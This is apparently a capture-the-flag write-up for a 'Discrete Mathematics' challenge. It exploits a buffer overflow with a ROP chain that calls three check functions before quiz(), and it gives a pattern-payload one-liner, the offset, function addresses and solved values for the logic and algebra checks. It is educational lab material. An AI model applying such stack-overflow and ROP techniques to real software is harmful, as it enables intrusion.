Discrete Mathematics
Buffer overflow, with a ROP chain.
Last updated
Buffer overflow, with a ROP chain.
Last updated
The same challenge, but this time we need ot build a ROP chain.
We can't just jump to quiz()
directly, since we need to make knows_logic
, knows_algebra
, and knows_functions
True. Each of these variables are only set within their corresponding functions: logic()
, algebra()
and functions()
.
If we build a ROP chain as follows, we can control the return addresses of subsequent returns.
Again, we will have to bypass the strcmp()
check:
Prepare our cyclic pattern payload:
python -c "print 'i will get an A' + '\x00' + 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'" > ipt.txt
We find that the offset is 56.
We find the function addresses:
logic: 0x00401236
algebra: 0x00401336
functions: 0x0040144d
quiz: 0x00401544
Now, we get an interactive connection where we will first jump to logic()
, then algebra()
, then functions()
.
We just have to figure out the appropriate values to pass the checks.
So, from (q != s) && s
, we know s
must be 1, q
must be 0.
Then, from (p || q || !r) && (!p || r || !s)
, we have (p || 0 || !r) && (!p || r || 0)
, which is (p || !r) && (!p || r)
. Either p = r = 0
or p = r = 1
works.
We can solve the simultaneous equations to get:
x = 3
y = -17
z = 12
The values seemed pretty small, so a bruteforce script easily gets the values.
We have:
a = 2
b = -8
c = 6
Plugging these values in, we get the flag.